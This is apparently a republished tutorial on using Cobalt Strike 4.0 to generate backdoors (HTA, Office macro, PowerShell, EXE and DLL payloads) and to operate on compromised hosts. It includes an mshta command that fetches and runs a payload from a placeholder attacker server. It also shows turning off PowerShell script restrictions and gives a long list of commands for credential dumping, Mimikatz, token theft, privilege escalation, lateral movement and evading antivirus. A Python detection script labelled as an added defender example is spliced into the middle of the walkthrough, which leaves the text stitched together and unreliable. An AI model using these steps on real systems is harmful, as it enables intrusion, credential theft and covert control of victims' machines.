
Several ways to generate Cobalt Strike 4.0 backdoors, and the basic operations after a host comes online

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article shows how Cobalt Strike 4.0 generates backdoors and what the basic operations are after a host comes online. The content is concise and easy to follow, and I hope you gain something from the walkthrough.

Steps: Attacks -> Packages -> one of the following:

HTML Application generates a malicious HTA Trojan file;

MS Office Macro generates an Office macro virus file;

Payload Generator generates payloads in various languages;

Windows Executable generates an executable EXE Trojan (staged);

Windows Executable (S) generates a stageless executable EXE Trojan.

1. HTML Application

Generating a malicious HTA Trojan file

An HTML Application is a Windows program written in HTML and a browser-supported scripting language. This package generates an HTML application that runs a Cobalt Strike payload. Select the Executable option to get an HTML application that drops an executable on disk and runs it.

Select the PowerShell option to get an HTML application that uses PowerShell to run a payload. Use the VBA option to silently spawn an instance of Microsoft Excel and run a malicious macro that injects the payload into memory.

Creating an HTML application

Attacks -> Packages -> HTML Application

There are three options:

Executable (generates an executable attack script)

PowerShell (generates a PowerShell script)

VBA (generates a VBA script; executed with the mshta command)

Here we use the PowerShell option, because in our test the other two methods did not bring the host online, and then host the generated file with Host File.

It then generates a URL; copy it:

http://x.x.x.x:8008/download/file.ext

and run it on the victim machine.

mshta http://x.x.x.x:8008/download/file.ext

Cobalt Strike then receives the callback and the host is online.

2. MS Office Macro

This package generates a Microsoft Office macro file and gives instructions for embedding the macro in Microsoft Word or Microsoft Excel. For making the macro file, refer to the macro section of my phishing article.

3. Payload Generator

This package lets you export Cobalt Strike stagers in a variety of formats.

Run Attacks -> Packages -> Payload Generator

This module can generate backdoor payloads in many languages and formats, including C, C#, Python, Java, Perl, PowerShell scripts, PowerShell commands, Ruby, Raw shellcode and Veil.

When penetrating Windows hosts, PowerShell and PowerShell Command are used most often, mainly because they are convenient and easy to use and can evade detection by antivirus software (AV).

Take PowerShell Command as an example: the generated payload is a series of commands, and as long as the host executes them (PowerShell must be installed on the host), Cobalt Strike receives the host's Beacon.

4. Windows Executable

This package generates a Windows executable Artifact that delivers a payload stager. It gives you several output options.

Windows Service EXE is a Windows executable that responds to Service Control Manager commands. You can use this executable to create a Windows service with the sc command, or generate a custom executable for the Metasploit Framework's PsExec module.

That is to say, an ordinary EXE and a service-started EXE are different. An EXE generated by Windows Service EXE can only be used as a self-starting service EXE, while the EXE generated by Cobalt Strike's Windows EXE option cannot be used as a service self-starting program (because it cannot respond to the Service Control Manager).

Windows DLL (32-bit) is an x86 Windows DLL.

Windows DLL (64-bit) is an x64 Windows DLL. This DLL spawns a 32-bit process and migrates your listener into it. Both DLL options export a Start function that is compatible with rundll32.exe. Use rundll32.exe to load your DLL from the command line. Check the Use x64 payload box to generate an x64 Artifact that matches the x64 stager. Check the Sign executable file box to sign an EXE or DLL Artifact with a code-signing certificate. You must specify the certificate in a C2 profile.

The above says a lot, but in practice it is simple: just confirm whether the victim's machine is x64 or x86 and run the EXE we generated.

5. Windows Executable (S)

This package directly exports Beacon (also called the payload stage), which is a 32- or 64-bit DLL written by the author. It is an executable that does not use a stager; it connects directly to the listener to transmit data and commands. A payload Artifact that does not use a stager is called a stageless Artifact. The package also has a PowerShell option to export Beacon as a PowerShell script, and a Raw option to export position-independent Beacon code.

By default this dialog exports the x86 payload stage. Check the Use x64 payload box to generate an x64 stage with an x64 Artifact. Check the Sign executable file box to sign an EXE or DLL Artifact with a code-signing certificate.

Here we try to generate a PowerShell payload.

But it cannot be run directly after generation.

So here we change the execution policy.

Only administrators have permission to change this policy; non-administrators get an error. To view the current script execution policy:

PS E:> Get-ExecutionPolicy

Change the script execution policy with:

PS E:> Get-ExecutionPolicy
Restricted
PS E:> Set-ExecutionPolicy UnRestricted

Then run the script again:
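As an added defender-side example (not from the original post and not Cobalt Strike's own code), the following Python flags the three host-side patterns the HTA and PowerShell steps above leave behind: mshta fetching an HTA over HTTP, Excel spawned by mshta (the VBA option), and Set-ExecutionPolicy being relaxed. The log lines, field names and rule names are constructed for this example, not real telemetry.

```python
import re

# Constructed process-creation events (not real telemetry): key=value pairs,
# one event per line, loosely modelled on Sysmon Event ID 1 / Security 4688.
CONSTRUCTED_EVENTS = """\
ts=2025-01-19T10:00:01 parent=explorer.exe image=mshta.exe cmd="mshta http://x.x.x.x:8008/download/file.ext"
ts=2025-01-19T10:00:02 parent=mshta.exe image=excel.exe cmd="excel.exe /automation -Embedding"
ts=2025-01-19T10:00:05 parent=explorer.exe image=powershell.exe cmd="powershell Set-ExecutionPolicy UnRestricted"
ts=2025-01-19T10:01:00 parent=explorer.exe image=mshta.exe cmd="mshta C:\\Tools\\local.hta"
ts=2025-01-19T10:01:10 parent=explorer.exe image=powershell.exe cmd="powershell Get-ExecutionPolicy"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')           # key=value or key="value with spaces"
REMOTE_HTA_RE = re.compile(r"\bhttps?://", re.IGNORECASE)  # mshta given a URL instead of a local file
WEAK_POLICY_RE = re.compile(
    r"set-executionpolicy\s+(?:-executionpolicy\s+)?(unrestricted|bypass)", re.IGNORECASE)
OFFICE_IMAGES = {"excel.exe", "winword.exe"}            # Office apps an HTA's VBA option would spawn


def parse_events(text):
    """Turn key=value lines into dicts; quoted values keep spaces, quotes are dropped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
        for key in ("parent", "image"):            # normalise image names for comparison
            ev[key] = ev.get(key, "").lower()
        events.append(ev)
    return events


def detect(events):
    """Return (rule, ts, cmd) for every event that matches one of the three patterns."""
    alerts = []
    for ev in events:
        image, parent, cmd = ev["image"], ev["parent"], ev.get("cmd", "")
        if image == "mshta.exe" and REMOTE_HTA_RE.search(cmd):
            alerts.append(("mshta_remote_hta", ev["ts"], cmd))
        if image == "powershell.exe" and WEAK_POLICY_RE.search(cmd):
            alerts.append(("execution_policy_weakened", ev["ts"], cmd))
        if parent == "mshta.exe" and image in OFFICE_IMAGES:
            alerts.append(("office_spawned_by_mshta", ev["ts"], cmd))
    return alerts


if __name__ == "__main__":
    for rule, ts, cmd in detect(parse_events(CONSTRUCTED_EVENTS)):
        print(f"{ts} {rule}: {cmd}")
```

The local HTA and the read-only Get-ExecutionPolicy lines are deliberately left unflagged so the rules can be checked against benign neighbours.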

Cobalt Strike 4.0: operations after a host comes online

Right-click menu:

I. Interact

Enter commands in the Beacon console

II. Access

Dump Hashes  # Dump hashes
Elevate  # Elevate privileges
Golden Ticket  # Generate a golden ticket and inject it into the current session
Make token  # Make a token from credentials
Run Mimikatz  # Run Mimikatz
Spawn As  # Spawn a Cobalt Strike session as another user

III. Explore

Browser Pivot  # Hijack the target's browser process
Desktop (VNC)  # Interactive desktop
File Browser  # File browser
Net View  # Run the net view command
Port Scan  # Port scan
Process List  # Process list
Screenshot  # Screenshot

IV. Pivoting

SOCKS Server  # Proxy service
Listener  # Reverse port forwarding
Deploy VPN  # Deploy VPN

V. Spawn

Spawn into an external listener (for example one assigned to MSF, to get a Meterpreter session)

VI. Session

Note  # Note
Color  # Mark with a color
Remove  # Delete the session
Sleep  # Specify the sleep (heartbeat) time of the controlled host, default 60 seconds; a value of 10 makes it fetch a task every 10 seconds, but in practice the interval should not be too short or it is easily noticed
Exit  # Exit

Commands available in Interact once a Beacon session is open:

1. argue  Process argument spoofing
2. blockdlls  Block non-Microsoft DLLs from loading in child processes
3. browserpivot  Inject into the victim's browser process
4. bypassuac  Elevate privileges by bypassing UAC
5. cancel  Cancel downloads in progress
6. cd  Change directory
7. checkin  Force the Beacon to call back once
8. clear  Clear the task queue inside Beacon
9. connect  Connect to a Beacon peer over TCP
10. covertvpn  Deploy a Covert VPN client
11. -
12. dcsync  Extract password hashes from a DC
13. desktop  Remote desktop (VNC)
14. dllinject  Reflectively inject a DLL into a process
15. dllload  Load a DLL into a process with LoadLibrary
16. download  Download a file
17. downloads  List downloads in progress
18. drives  List drive letters on the target
19. elevate  Elevate privileges with an exploit
20. execute  Execute a program on the target (no output)
21. execute-assembly  Execute a local .NET program in memory on the target
22. -
23. getprivs  Enable system privileges on the current token
24. getsystem  Attempt to get SYSTEM privileges
25. getuid  Get the user ID
26. hashdump  Dump password hashes
27. -
28. inject  Inject into a process to spawn a session
29. jobkill  Kill a background task
30. jobs  List background tasks
31. kerberos_ccache_use  Apply a Kerberos ticket from a ccache file to this session
32. kerberos_ticket_purge  Purge Kerberos tickets for the current session
33. kerberos_ticket_use  Apply a Kerberos ticket from a ticket file to this session
34. -
35. -
36. link  Connect to a Beacon peer over a named pipe
37. logonpasswords  Dump credentials and hashes with Mimikatz
38. -
39. make_token  Create a token to pass credentials
40. mimikatz  Run a Mimikatz command
41. mkdir  Create a directory
42. mode dns  Use DNS A records as the communication channel (DNS Beacon only)
43. mode dns-txt  Use DNS TXT records as the communication channel (DNS Beacon only)
44. mode dns6  Use DNS AAAA records as the communication channel (DNS Beacon only)
45. mode http  Use HTTP as the communication channel
46. -
47. -
48. note  Assign a note to this Beacon
49. portscan  Port scan
50. powerpick  Execute commands via Unmanaged PowerShell
51. powershell  Execute commands via powershell.exe
52. powershell-import  Import a PowerShell script
53. ppid  Set the parent PID for spawned post-exploitation jobs
54. -
55. psexec  Use a service to spawn a session on a host
56. psexec_psh  Use PowerShell to spawn a session on a host
57. psinject  Execute PowerShell commands in a specific process
58. pth  Pass-the-hash using Mimikatz
59. -
60. reg  Query the registry
61. -
62. rm  Delete a file or folder
63. -
64. run  Run a program on the target (returns output)
65. runas  Execute a program as another user
66. runasadmin  Execute a program in an elevated context
67. runu  Execute a program under another PID
68. -
69. -
70. -
71. -
72. shspawn  Start a process and inject shellcode into it
73. -
74. -
75. socks stop  Stop the SOCKS server
76. spawn  Spawn a session
77. spawnas  Spawn a session as another user
78. spawnto  Set the executable to spawn processes into
79. spawnu  Spawn a session under another PID
80. ssh  Use SSH to connect to a remote host
81. ssh-key  Use an SSH key to connect to a remote host
82. steal_token  Steal a token from a process
83. timestomp  Apply the timestamps of one file to another file
84. unlink  Disconnect from the parent Beacon
85. -
86. wdigest  Dump credentials with Mimikatz
87. -
88. wmi  Lateral movement via WMI

That covers the ways Cobalt Strike 4.0 generates backdoors and the basic operations after a host comes online.
